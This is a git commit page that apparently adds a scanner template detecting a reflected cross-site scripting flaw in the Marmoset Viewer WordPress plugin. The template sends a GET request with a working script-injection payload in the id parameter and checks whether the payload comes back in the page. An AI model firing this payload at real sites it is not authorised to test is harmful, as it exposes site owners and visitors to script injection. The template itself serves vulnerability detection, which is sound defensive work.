Add Marmoset Viewer XSS Vulnerability

Reference:
https://wordpress.org/plugins/marmoset-viewer/#developers
patch-1
John Jackson 2021-06-30 01:12:12 -06:00 committed by GitHub
parent 96fc7bb341
commit d2df3303c6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
id: wp-plugin-marmoset-viewer-xss
info:
name: Wordpress Plugin Marmoset Viewer XSS
author: johnjhacking
severity: medium
tags: xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27hacked%27)>"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><svg/onload=alert('hacked')>"
part: body